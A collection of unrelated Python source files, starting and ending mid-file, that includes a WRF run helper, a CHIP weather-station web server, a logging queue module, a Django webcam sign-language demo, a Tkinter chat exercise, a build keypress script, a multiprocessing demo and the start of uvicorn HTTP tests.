os.remove(self.directory_wrf_run+'/wrfinput_d0'+str(domain))
shutil.copyfile(self.directory_PreProcessing_run+'/Real_initial/wrfinput_d0'+str(domain), self.directory_wrf_run+'/wrfinput_d0'+str(domain))
#Hook in the tslist: if this file exists, copy it to the run directory.
if self.tsfile is not None:
logging.info('run_WRF: a time series file (ts_file) is being read in from '+ str(self.tsfile))
if os.path.exists(self.tsfile):
shutil.copyfile(self.tsfile, self.directory_wrf_run+'/tslist')
#Run WRF
self._execute_WRF(self.numberCores, self.directory_wrf_run, self.norunwrf)
#Log end-of-run
logging.info('run_WRF: wrf.exe finished!')
@staticmethod
def _execute_WRF(number_cores, directory_wrf_run, norunwrf):
"""
Starting wrf.exe
"""
if norunwrf:
logging.info('_execute_WRF: run WRF.exe has been skipped by the user. ')
else:
# record start of execution of wrf.exe
logging.info('_execute_WRF: run WRF.exe')
os.chdir(directory_wrf_run)
process = subprocess.Popen(['mpirun', '-np', str(number_cores), './wrf.exe'])
process.wait()
@staticmethod
def _download_geog_data(directory_root_geog, directory_root_input):
"""
Download static geog data if the user does not already have it.
"""
logging.warning('_download_geog_data no geog data exists. This will be downloaded for you and extracted to '+directory_root_geog)
os.makedirs(directory_root_geog)
process = subprocess.Popen(['/bin/bash', '/opt/deepthunder/stevedore/scripts/download_geog_data.sh'])
process.wait()
os.chdir(directory_root_input)
@staticmethod
def _get_num_metgrid_levels(filename):
"""
From a netcdf file output from metgrid obtain the value of num_metgrid_levels
"""
#ncdump -h met_em.d01.2017-04-12_00:00:00.nc | grep 'num_metgrid_levels =' | cut -d " " -f3
#log entry:
logging.debug("In _get_num_metgrid_levels")
#Load the dataset from the selected filename.
froot = Dataset(filename, "r", format="NETCDF4")
#Get the dimension 'num_metgrid_levels'
levels = froot.dimensions["num_metgrid_levels"]
#Return the size of num_metgrid_levels as an int.
return int(len(levels))
@staticmethod
def _get_num_metgrid_soil_levels(filename):
"""
From a netcdf file output from metgrid obtain the value of num_metgrid_soil_levels
"""
#log entry:
logging.debug("In _get_num_metgrid_soil_levels")
#Load the dataset from the selected filename.
rootgrp = Dataset(filename, "r", format="NETCDF4")
#get the attributes
soil_levels = getattr(rootgrp, 'NUM_METGRID_SOIL_LEVELS')
#Return the number of soil levels as an int.
return int(soil_levels)
|
weather.py
|
# -*- coding: utf-8 -*-
'''
See Installation directory for installation dependencies
https://docs.getchip.com/chip.html#how-you-see-gpio
https://bbs.nextthing.co/t/reading-dht11-dht22-am2302-sensors/2383/78
'''
from bottle import Bottle, route, run, static_file, response
from threading import Thread
import subprocess
import os
import time
import rrdtool
import datetime
import ConfigParser
import uuid
import netifaces
import netaddr
import socket
import urllib2
import multiprocessing
import logging
logger = logging.getLogger(__name__)
#from gevent import monkey, sleep
#monkey.patch_all()
def check_device(ipnumber):
try:
req = urllib2.Request('http://' + ipnumber + ':8080/api/info')
response = urllib2.urlopen(req)
return ipnumber
except Exception, err:
pass
return None
class CHIPWeatherStationUtils():
@staticmethod
def to_fahrenheit(value):
return float(value) * 9.0 / 5.0 + 32.0
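# Example: to_fahrenheit(25.0) == 77.0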
@staticmethod
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
@staticmethod
def get_ip_number():
for interface in netifaces.interfaces():
if interface in ['lo','sit']:
continue
networkdata = netifaces.ifaddresses(interface)
if netifaces.AF_INET in networkdata:
for ip in networkdata[netifaces.AF_INET]:
if 'addr' in ip and 'netmask' in ip and not ip['addr'].startswith('169'):
return ip['addr']
return False
@staticmethod
def get_network_ip_numbers():
data = []
for interface in netifaces.interfaces():
if interface in ['lo','sit']:
continue
networkdata = netifaces.ifaddresses(interface)
if netifaces.AF_INET in networkdata:
for ip in networkdata[netifaces.AF_INET]:
if 'addr' in ip and 'netmask' in ip and not ip['addr'].startswith('169'):
try:
iprange = netaddr.IPNetwork(ip['addr'] + '/' + ip['netmask'])
for ipnumber in iprange.iter_hosts():
data.append(str(ipnumber))
except Exception, err:
#print err
pass
return data
class CHIPWeatherStationConfig():
def __init__(self):
self.__defaults_file = 'defaults.cfg'
self.__config_file = 'settings.cfg'
self.__config = ConfigParser.SafeConfigParser()
# Read defaults config file
self.__config.readfp(open(self.__defaults_file))
# Read new version number
version = self.__get_config('system')['version']
# Read custom config file
self.__config.read(self.__config_file)
# Update version number
self.__config.set('system', 'version', str(version))
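# Note: reading defaults.cfg first and settings.cfg second means user settings override the defaults,
# while the version number is always refreshed from defaults.cfg.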
def __save_config(self):
'''Write the weather station config to the settings.cfg file'''
with open(self.__config_file, 'wb') as configfile:
self.__config.write(configfile)
return True
def __get_config(self,section):
'''Get a config section. Return an empty dict when the section does not exist
Keyword arguments:
section -- section to read from the config'''
config = {}
if not self.__config.has_section(section):
return config
for config_part in self.__config.items(section):
config[config_part[0]] = config_part[1]
return config
def get_version(self):
return self.__get_config('system')['version']
def get_uuid(self):
sensorid = None
if 'sensorid' in self.__get_config('system'):
sensorid = self.__get_config('system')['sensorid']
else:
sensorid = str(uuid.uuid4())
self.__config.set('system', 'sensorid', str(sensorid))
self.__save_config()
return sensorid
def get_name(self):
return self.__get_config('system')['name']
def get_led_pin(self):
return int(self.__get_config('system')['gpio_led'])
def get_host_name(self):
return self.__get_config('system')['hostname']
def get_port_number(self):
return self.__get_config('system')['portnumber']
class CHIPWeatherStationLEDIndicator():
def __init__(self, pin):
self.__active = False
self.__base_pin = None
self.__scan_pin_base()
if self.__base_pin is not None:
self.pin = self.__base_pin + pin
self.__init_gpio()
self.off()
else:
logger.error('GPIO is not available!')
print 'ERROR, no GPIO available!'
def __scan_pin_base(self):
self.__base_pin = subprocess.Popen('grep -l pcf8574a /sys/class/gpio/*/*label | grep -o "[0-9]*"',
shell=True,
stdout=subprocess.PIPE).communicate()[0].strip()
if CHIPWeatherStationUtils.is_number(self.__base_pin):
self.__base_pin = int(self.__base_pin)
def __init_gpio(self):
# Open GPIO pin
if os.path.isfile('/sys/class/gpio/gpio' + str(self.pin) + '/value'):
self.close()
subprocess.Popen('echo ' + str(self.pin) + ' > /sys/class/gpio/export',shell=True,stdout=subprocess.PIPE)
# Set direction to OUT going
subprocess.Popen('echo out > /sys/class/gpio/gpio' + str(self.pin) + '/direction',shell=True,stdout=subprocess.PIPE)
# Force output closed by default
subprocess.Popen('echo 1 > /sys/class/gpio/gpio' + str(self.pin) + '/active_low',shell=True,stdout=subprocess.PIPE)
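# Note: with active_low set to 1 the pin logic is inverted, so writing 1 to 'value' (in on()) drives the
# physical pin low; presumably the LED is wired between the supply rail and the pin.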
self.__active = True
def on(self):
if self.__active:
subprocess.Popen('echo 1 > /sys/class/gpio/gpio' + str(self.pin) + '/value',shell=True,stdout=subprocess.PIPE)
def off(self):
if self.__active:
subprocess.Popen('echo 0 > /sys/class/gpio/gpio' + str(self.pin) + '/value',shell=True,stdout=subprocess.PIPE)
def close(self):
subprocess.Popen('echo ' + str(self.pin) + ' > /sys/class/gpio/unexport',shell=True,stdout=subprocess.PIPE)
class CHIPWeatherStationCPUSensor():
def __init__(self):
self.__cpu_temp = 0.0
self.__last_update = 0.0
self.__update_time_out = 60.0
self.__update()
def __update(self):
now = time.time()
if now - self.__last_update > self.__update_time_out:
cpu_temp = subprocess.Popen('/usr/sbin/axp209 --temperature',
shell=True,
stdout=subprocess.PIPE).communicate()[0].strip()
if 'oC' in cpu_temp:
self.__cpu_temp = float(cpu_temp.replace('oC','').strip())
self.__last_update = now
def get_temperature(self):
self.__update()
return self.__cpu_temp
class CHIPWeatherStationSensor():
def __init__(self):
self.__last_temp_update = 0.0
self.__last_hum_update = 0.0
self.__update_time_out = 60.0
self.__temperature = 0.0
self.__humidity = 0.0
self.__sensor_path = None
self.__scan_sensor()
self.__update()
def __scan_sensor(self):
self.__sensor_path = subprocess.Popen('grep -l humidity_sensor /sys/bus/iio/devices/iio:device*/name',
shell=True,
stdout=subprocess.PIPE).communicate()[0].strip().replace('/name','')
if self.__sensor_path == '':
self.__sensor_path = None
def __update(self):
now = time.time()
if self.__sensor_path is None:
return False
if now - self.__last_hum_update > self.__update_time_out:
for attempt in xrange(0,3):
try:
if os.path.isfile(self.__sensor_path + '/in_humidityrelative_input'):
with open(self.__sensor_path + '/in_humidityrelative_input') as sensor:
self.__humidity = sensor.read()
self.__humidity = int(self.__humidity.strip())
self.__last_hum_update = now
break
except IOError, err:
pass
time.sleep(1)
if now - self.__last_temp_update > self.__update_time_out:
for attempt in xrange(0,3):
try:
if os.path.isfile(self.__sensor_path + '/in_temp_input'):
with open(self.__sensor_path + '/in_temp_input') as sensor:
self.__temperature = sensor.read()
self.__temperature = int(self.__temperature.strip())
self.__last_temp_update = now
break
except IOError, err:
pass
time.sleep(1)
def get_temperature(self):
self.__update()
return float(self.__temperature) / 1000
def get_humidity(self):
self.__update()
return float(self.__humidity) / 1000
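# The sysfs readings appear to be reported in milli-units (e.g. 23450 -> 23.45 C, 41200 -> 41.2 %RH),
# hence the division by 1000 in the two getters above.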
class CHIPWeatherStationDatabase():
def __init__(self,config):
self.__config = config
self.__data_file = 'data.rrd'
if not os.path.isfile(self.__data_file):
self.__create_rrd_database()
def __create_rrd_database(self):
rrdtool.create( self.__data_file,
'--start', 'N',
'--step', '60',
'DS:cputemp:GAUGE:600:U:U',
'DS:temp:GAUGE:600:U:U',
'DS:humidity:GAUGE:600:U:U',
'RRA:AVERAGE:0.5:1:' + str( 60 * 24 ),
'RRA:MIN:0.5:1:' + str( 60 * 24 ),
'RRA:MAX:0.5:1:' + str( 60 * 24 ),
'RRA:AVERAGE:0.5:60:168',
'RRA:MIN:0.5:60:168',
'RRA:MAX:0.5:60:168',
'RRA:AVERAGE:0.5:' + str( 60 * 24 ) + ':365',
'RRA:MIN:0.5:' + str( 60 * 24 ) + ':365',
'RRA:MAX:0.5:' + str( 60 * 24 ) + ':365')
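# With a 60 s step, the archives above keep: per-minute AVERAGE/MIN/MAX for 24 h (60*24 rows),
# hourly (60-step) aggregates for 168 hours (one week), and daily (1440-step) aggregates for 365 days.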
def update(self, cputemp, temp, humidity):
try:
ret = rrdtool.update(self.__data_file, 'N:%s:%s:%s' % (cputemp,
temp,
humidity));
except Exception, err:
pass
def create_graphs(self):
for sched in ['daily' , 'weekly', 'monthly']:
if sched == 'weekly':
period = 'w'
elif sched == 'daily':
period = 'd'
elif sched == 'monthly':
period = 'm'
ret = rrdtool.graph('web/%s.png' %(sched),
'--slope-mode',
'--start',
'-1%s' %(period),
'--title=CHIP Weather Station %s graph' % sched,
'--vertical-label=Measurement',
'--watermark=Dongle ID %s, software version %s, last update %s' % (self.__config.get_uuid(),
self.__config.get_version(),
datetime.datetime.now().strftime('%d-%m-%Y %H:%M:%S')),
'-w 500',
'-h 150',
'-A',
'--border=0',
'--color=BACK#000000',
'--color=CANVAS#FFFFFF20',
'--color=GRID#FFFFFF20',
'--color=MGRID#adadad',
'--color=FONT#FFFFFF',
'--color=FRAME#FFFFFF20',
'--color=ARROW#FFFFFF',
'COMMENT:' + '{:<30}'.format(''),
'COMMENT:' + '{:<10}'.format('Current'),
'COMMENT:' + '{:<10}'.format('Maximum'),
'COMMENT:' + '{:<10}'.format('Average'),
'COMMENT:Minimum\l',
'DEF:Humidity=' + self.__data_file + ':humidity:AVERAGE',
'AREA:Humidity#0000FF60:' + '{:<28}'.format('Humidity in %'),
'LINE2:Humidity#0000FF',
'GPRINT:Humidity:LAST:%6.2lf%%' + '{:<3}'.format(''),
'GPRINT:Humidity:MAX:%6.2lf%%' + '{:<3}'.format(''),
'GPRINT:Humidity:AVERAGE:%6.2lf%%' + '{:<3}'.format(''),
'GPRINT:Humidity:MIN:%6.2lf%%\l',
'DEF:Temperature=' + self.__data_file + ':temp:AVERAGE',
'LINE2:Temperature#00FF0080:' + '{:<28}'.format('Temperature in C'),
'GPRINT:Temperature:LAST:%6.2lfC' + '{:<3}'.format(''),
'GPRINT:Temperature:MAX:%6.2lfC' + '{:<3}'.format(''),
'GPRINT:Temperature:AVERAGE:%6.2lfC' + '{:<3}'.format(''),
'GPRINT:Temperature:MIN:%6.2lfC\l',
'DEF:CPUTemperature=' + self.__data_file + ':cputemp:AVERAGE',
'LINE2:CPUTemperature#FF000080:' + '{:<28}'.format('CPU Temperature in C'),
'GPRINT:CPUTemperature:LAST:%6.2lfC' + '{:<3}'.format(''),
'GPRINT:CPUTemperature:MAX:%6.2lfC' + '{:<3}'.format(''),
'GPRINT:CPUTemperature:AVERAGE:%6.2lfC' + '{:<3}'.format(''),
'GPRINT:CPUTemperature:MIN:%6.2lfC\l'
)
class CHIPWeatherStationEngine():
def __init__(self):
self.__config = CHIPWeatherStationConfig()
self.__database = CHIPWeatherStationDatabase(self.__config)
self.__temp_hum_sensor = CHIPWeatherStationSensor()
self.__cpu_sensor = CHIPWeatherStationCPUSensor()
self.__status_led = CHIPWeatherStationLEDIndicator(self.__config.get_led_pin())
self.__ip = CHIPWeatherStationUtils.get_ip_number()
self.__engine = Thread(target = self.__engine_loop,)
self.__engine.daemon = True
self.__engine.start()
self.__sensor_scan_progress = None
# self.scan_sensors()
def __engine_loop(self):
while True:
self.__status_led.on()
self.__database.update(self.__cpu_sensor.get_temperature(),
self.__temp_hum_sensor.get_temperature(),
self.__temp_hum_sensor.get_humidity())
self.__database.create_graphs()
self.__status_led.off()
            print 'Done updating. CPU: %f, Temp: %f, Humidity: %f. Scan progress %f%%. Next update in 30 seconds' % (self.__cpu_sensor.get_temperature(),
self.__temp_hum_sensor.get_temperature(),
self.__temp_hum_sensor.get_humidity(),
self.get_scan_status())
time.sleep(30)
def __scan_sensors(self):
iplist = CHIPWeatherStationUtils.get_network_ip_numbers()
counter = 0.0
total = float(len(iplist))
self.__sensor_scan_progress = 0.0
print 'Start sensor scanning (%s) ...' % total
pool = multiprocessing.Pool(10)
for device in pool.imap_unordered(check_device, iplist):
counter += 1.0
self.__sensor_scan_progress = (counter / total ) * 100
if device is not None:
print device
self.__sensor_scan_progress = None
def scan_sensors(self):
if not self.is_scanning():
timeout = 3
socket.setdefaulttimeout(timeout)
Thread(target=self.__scan_sensors).start()
def get_scan_status(self):
return self.__sensor_scan_progress if self.__sensor_scan_progress is not None else -1
def get_uuid(self):
return self.__config.get_uuid()
def get_version(self):
return self.__config.get_version()
def get_name(self):
return self.__config.get_name()
def get_ip_number(self):
return self.__ip
def get_temperature(self):
return self.__temp_hum_sensor.get_temperature()
def get_humidity(self):
return self.__temp_hum_sensor.get_humidity()
def is_scanning(self):
        return self.get_scan_status() >= 0.0
def cleanup(self):
print 'Cleanup....'
self.__status_led.off()
self.__status_led.close()
class CHIPWeatherStationWebServer(Bottle):
def __init__(self, host = '::', port = 8080):
self.__engine = CHIPWeatherStationEngine()
self.__host = host
self.__port = port
self.__set_routes()
def __api_call(self,url):
if 'info' == url:
return {'uuid' : self.__engine.get_uuid(),
'name' : self.__engine.get_name(),
'ip': self.__engine.get_ip_number(),
'scanning' : self.__engine.is_scanning(),
'uptime': 0,
'version' : self.__engine.get_version()}
elif 'temperature' == url:
return {'uuid' : self.__engine.get_uuid(),
'value' : self.__engine.get_temperature()}
elif 'humidity' == url:
return {'uuid' : self.__engine.get_uuid(),
'value' : self.__engine.get_humidity()}
def __set_routes(self):
@route('/')
def index():
return '<meta http-equiv="refresh" content="0;index.html"/>'
@route('/api/<url:path>')
def callback(url):
response.set_header('Access-Control-Allow-Origin', '*')
return self.__api_call(url)
@route('/<path:re:.*>')
def callback(path):
return static_file(path,root='web')
def cleanup(self):
self.__engine.cleanup()
def start_server(self):
run(host=self.__host,
port=self.__port,
debug=True,
reloader=False,
quiet=False)
if __name__ == "__main__":
CHIPWeatherStation = CHIPWeatherStationWebServer()
try:
CHIPWeatherStation.start_server()
except KeyboardInterrupt:
print 'KILL KILL KILL'
finally:
CHIPWeatherStation.cleanup()
|
queue.py
|
#
# Copyright (C) 2010-2017 Vinay Sajip. See LICENSE.txt for details.
#
"""
This module contains classes which help you work with queues. A typical
application is when you want to log from performance-critical threads, but
where the handlers you want to use are slow (for example,
:class:`~logging.handlers.SMTPHandler`). In that case, you can create a queue,
pass it to a :class:`QueueHandler` instance and use that instance with your
loggers. Elsewhere, you can instantiate a :class:`QueueListener` with the same
queue and some slow handlers, and call :meth:`~QueueListener.start` on it.
This will start monitoring the queue on a separate thread and call all the
configured handlers *on that thread*, so that your logging thread is not held
up by the slow handlers.
Note that as well as in-process queues, you can use these classes with queues
from the :mod:`multiprocessing` module.
**N.B.** This is part of the standard library since Python 3.2, so the
version here is for use with earlier Python versions.
"""
import logging
try:
import Queue as queue
except ImportError:
import queue
import threading
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
:param queue: The queue to send `LogRecords` to.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses :meth:`~queue.Queue.put_nowait`. You may
want to override this method if you want to use blocking, timeouts or
custom queue implementations.
:param record: The record to enqueue.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
:param record: The record to prepare.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
:param record: The record to emit.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
    :param queue: The queue to listen to.
:param handlers: The handlers to invoke on everything received from
the queue.
"""
_sentinel = None
def __init__(self, queue, *handlers, **kwargs):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = kwargs.get('respect_handler_level', False)
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses :meth:`~queue.Queue.get`. You may want to
override this method if you want to use timeouts or work with custom
queue implementations.
:param block: Whether to block if the queue is empty. If `False` and
the queue is empty, an :class:`~queue.Empty` exception
will be thrown.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
    def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
:param record: The record to prepare.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
:param record: The record to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
Writes a sentinel to the queue to tell the listener to quit. This
implementation uses ``put_nowait()``. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
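# A minimal usage sketch added for illustration; it is not part of the
# original module. It wires a QueueHandler and a QueueListener together as
# described in the module docstring above. The logger name and the choice of
# StreamHandler are illustrative assumptions, not requirements of this module.
if __name__ == '__main__':
    import sys

    log_queue = queue.Queue(-1)  # unbounded in-process queue
    listener = QueueListener(log_queue, logging.StreamHandler(sys.stderr))
    listener.start()  # slow handlers now run on the listener's thread

    logger = logging.getLogger('queue_demo')
    logger.setLevel(logging.INFO)
    logger.addHandler(QueueHandler(log_queue))  # cheap, non-blocking for callers
    logger.info('hello from the queue demo')

    listener.stop()  # flush remaining records and join the listener thread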
|
views.py
|
from django.shortcuts import render
from django.views.decorators import gzip
from django.http import StreamingHttpResponse
import cv2
import numpy as np
import threading
import tensorflow as tf
@gzip.gzip_page
def Home(request):
return render(request, 'index.html')
class VideoCamera(object):
def __init__(self):
self.video = cv2.VideoCapture(0)
(self.grabbed, self.frame) = self.video.read()
threading.Thread(target=self.update, args=()).start()
self.model = tf.keras.models.load_model('sign_language.h5')
def __del__(self):
self.video.release()
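    # get_frame below JPEG-encodes the latest captured frame for streaming
    # and also feeds a 28x28 grayscale copy of it to the loaded Keras model,
    # returning both the JPEG bytes and the raw prediction array.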
def get_frame(self):
image = self.frame
# print(image.shape)
_, jpeg = cv2.imencode('.jpg', image)
ri = cv2.resize(cv2.cvtColor(image, cv2.COLOR_BGR2GRAY), (28,28))
ri = np.expand_dims(ri, axis = (0,3))
out = self.model.predict(ri)
out = out.astype('uint8')
# print(out)
return jpeg.tobytes(),out
def update(self):
while True:
(self.grabbed, self.frame) = self.video.read()
# Camera Object
cam = VideoCamera()
def test_stream(request):
try:
# cam = VideoCamera()
return StreamingHttpResponse(generateImage(cam), content_type="multipart/x-mixed-replace;boundary=frame")
except:
pass
def stream_response(request):
yield "%s\n" % "A"
def text_stream(request):
# cam = VideoCamera()
resp = StreamingHttpResponse(predictSign(cam), content_type="multipart/x-mixed-replace;boundary=frame")
return resp
# Returns Image to html
def generateImage(camera):
while True:
frame,out = camera.get_frame()
yield "<html><body>\n"
yield "<div>%s</div>\n" % out
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n\r\n')
yield "</body></html>\n"
# Returns Predicted Handsign
def predictSign(camera):
while True:
frame,out = camera.get_frame()
listt = ["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y"]
# print(len(out[0]),len(listt))
if(1 not in out[0]):
yield ""
else:
yield "%s\n" % listt[list(out[0]).index(1)]
|
16.8.1.py
|
#!/usr/bin/env python
# encoding: UTF-8
"""Exercise answer 16.8.1 for chapter 16."""
__author__ = 'Ibuki Suika'
from Tkinter import *
from ttk import *
from socket import *
from select import select
from threading import Thread
from time import ctime
class App(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.pack()
        self.master.title('Python Chat Program')
self.frm1 = Frame()
self.frm1.pack(fill=BOTH)
self.frm2 = Frame()
self.frm2.pack(side=BOTTOM, fill=X)
self.txt = Listbox(self.frm1, width=100, height=20)
self.txt.pack(side=LEFT, fill=X)
self.bar = Scrollbar(self.frm1)
self.bar.pack(side=RIGHT, fill=Y)
self.txt['yscrollcommand'] = self.bar.set
self.bar['command'] = self.txt.yview
        self.lbl = Label(self.frm2, text='To send:')
self.lbl.pack(side=LEFT)
self.content = StringVar()
self.entry = Entry(self.frm2, width=80, textvariable=self.content)
self.entry.pack(side=LEFT)
        self.btn = Button(self.frm2, text='Send', command=self.send_msg)
self.btn.pack(side=LEFT)
def send_msg(self):
pass
class ServerApp(App):
def __init__(self, host, port):
App.__init__(self)
self.server = socket(AF_INET, SOCK_STREAM)
self.server.setblocking(False)
self.server.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.server.bind((host, port))
self.server.listen(1)
self.inputs = [self.server]
t = Thread(target=self.server_loop)
t.setDaemon(True)
t.start()
    def __del__(self):
        for sock in self.inputs:
            sock.close()
def send_msg(self):
s = self.content.get()
self.txt.insert(END, '[%s] me:' % ctime())
self.txt.insert(END, s)
self.content.set('')
if len(self.inputs) == 2:
self.inputs[1].send(s)
def server_loop(self):
while True:
readers, writers, exceptions = select(self.inputs, [], [])
for reader in readers:
if reader is self.server:
conn, addr = reader.accept()
conn.setblocking(False)
self.inputs.append(conn)
else:
data = reader.recv(1024)
if data:
self.txt.insert(END, '[%s] stranger:' % ctime())
self.txt.insert(END, data)
else:
self.inputs.remove(reader)
if __name__ == '__main__':
app = ServerApp('', 50007)
app.mainloop()
|
install_mikeros_tools_and_press_enter.py
|
# https://stackoverflow.com/a/23468236
# NOTE: THIS SCRIPT SHOULD ONLY BE USED IN APPVEYOR
# Using it anywhere else is just pointless
# This script simulates keypresses to bypass Mikero's stupid unskippable popup window
# (the one about the 1024 characters limit)
# If you're Mikero and you're reading this, then I'm sorry but it's stupid that there
# is no switch to turn it off.
# Yes I know that the paid tools don't have this limitation but I'm quite sure that
# I'm not allowed to just let those tools be widely accessible to anyone looking at
# the build log
import ctypes
import multiprocessing
import time
import install_mikeros_tools
SendInput = ctypes.windll.user32.SendInput
# C struct redefinitions
PUL = ctypes.POINTER(ctypes.c_ulong)
class KeyBdInput(ctypes.Structure):
_fields_ = [("wVk", ctypes.c_ushort),
("wScan", ctypes.c_ushort),
("dwFlags", ctypes.c_ulong),
("time", ctypes.c_ulong),
("dwExtraInfo", PUL)]
class HardwareInput(ctypes.Structure):
_fields_ = [("uMsg", ctypes.c_ulong),
("wParamL", ctypes.c_short),
("wParamH", ctypes.c_ushort)]
class MouseInput(ctypes.Structure):
_fields_ = [("dx", ctypes.c_long),
("dy", ctypes.c_long),
("mouseData", ctypes.c_ulong),
("dwFlags", ctypes.c_ulong),
("time",ctypes.c_ulong),
("dwExtraInfo", PUL)]
class Input_I(ctypes.Union):
_fields_ = [("ki", KeyBdInput),
("mi", MouseInput),
("hi", HardwareInput)]
class Input(ctypes.Structure):
_fields_ = [("type", ctypes.c_ulong),
("ii", Input_I)]
# Actual Functions
def PressKey(hexKeyCode):
extra = ctypes.c_ulong(0)
ii_ = Input_I()
ii_.ki = KeyBdInput( 0, hexKeyCode, 0x0008, 0, ctypes.pointer(extra) )
x = Input( ctypes.c_ulong(1), ii_ )
ctypes.windll.user32.SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))
def ReleaseKey(hexKeyCode):
extra = ctypes.c_ulong(0)
ii_ = Input_I()
ii_.ki = KeyBdInput( 0, hexKeyCode, 0x0008 | 0x0002, 0, ctypes.pointer(extra) )
x = Input( ctypes.c_ulong(1), ii_ )
ctypes.windll.user32.SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))
# directx scan codes http://www.gamespp.com/directx/directInputKeyboardScanCodes.html
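# 0x1C, used below, is the DirectInput scan code for the Enter/Return key.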
if __name__ == '__main__':
multiprocessing.freeze_support()
p = multiprocessing.Process(target=install_mikeros_tools.main, args=())
p.start()
while (p.is_alive()):
PressKey(0x1C)
time.sleep(0.1)
ReleaseKey(0x1C)
time.sleep(1)
|
MultiProcessDaemon.py
|
import multiprocessing
import time
import sys
def daemon():
p = multiprocessing.current_process()
print('Starting:',p.name, p.pid)
sys.stdout.flush()
time.sleep(2)
print('Exiting:', p.name, p.pid)
sys.stdout.flush()
return
def non_daemon():
p = multiprocessing.current_process()
print('Starting:',p.name,p.pid)
sys.stdout.flush()
print('Exiting:',p.name,p.pid)
sys.stdout.flush()
if __name__ == '__main__':
d = multiprocessing.Process(
name='daemon',target=daemon)
d.daemon=True
n = multiprocessing.Process(
name='non-daemon', target=non_daemon)
n.daemon=False
d.start()
time.sleep(1)
n.start()
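
    # Note on the expected output (comment added for clarity): the non-daemon
    # process is joined automatically when the main process exits, so both of
    # its messages appear; the daemon process is still inside its 2-second
    # sleep at that point and is terminated, so its 'Exiting' line normally
    # never prints.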
|
test_http.py
|
import asyncio
import contextlib
import logging
import socket
import threading
import time
import pytest
from tests.response import Response
from uvicorn import Server
from uvicorn.config import Config
from uvicorn.main import ServerState
from uvicorn.protocols.http.h11_impl import H11Protocol
try:
from uvicorn.protocols.http.httptools_impl import HttpToolsProtocol
except ImportError: # pragma: nocover
HttpToolsProtocol = None
HTTP_PROTOCOLS = [p for p in [H11Protocol, HttpToolsProtocol] if p is not None]
SIMPLE_GET_REQUEST = b"\r\n".join([b"GET / HTTP/1.1", b"Host: example.org", b"", b""])
SIMPLE_HEAD_REQUEST = b"\r\n".join([b"HEAD / HTTP/1.1", b"Host: example.org", b"", b""])
SIMPLE_POST_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Content-Type: application/json",
b"Content-Length: 18",
b"",
b'{"hello": "world"}',
]
)
LARGE_POST_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Content-Type: text/plain",
b"Content-Length: 100000",
b"",
b"x" * 100000,
]
)
START_POST_REQUEST = b"\r\n".join(
[
b"POST / HTTP/1.1",
b"Host: example.org",
b"Content-Type: application/json",
b"Content-Length: 18",
b"",
b"",
]
)
FINISH_POST_REQUEST = b'{"hello": "world"}'
HTTP10_GET_REQUEST = b"\r\n".join([b"GET / HTTP/1.0", b"Host: example.org", b"", b""])
GET_REQUEST_WITH_RAW_PATH = b"\r\n".join(
[b"GET /one%2Ftwo HTTP/1.1", b"Host: example.org", b"", b""]
)
UPGRADE_REQUEST = b"\r\n".join(
[
b"GET / HTTP/1.1",
b"Host: example.org",
b"Connection: upgrade",
b"Upgrade: websocket",
b"Sec-WebSocket-Version: 11",
b"",
b"",
]
)
INVALID_REQUEST_TEMPLATE = b"\r\n".join(
[
b"%s",
b"Host: example.org",
b"",
b"",
]
)
class MockTransport:
def __init__(self, sockname=None, peername=None, sslcontext=False):
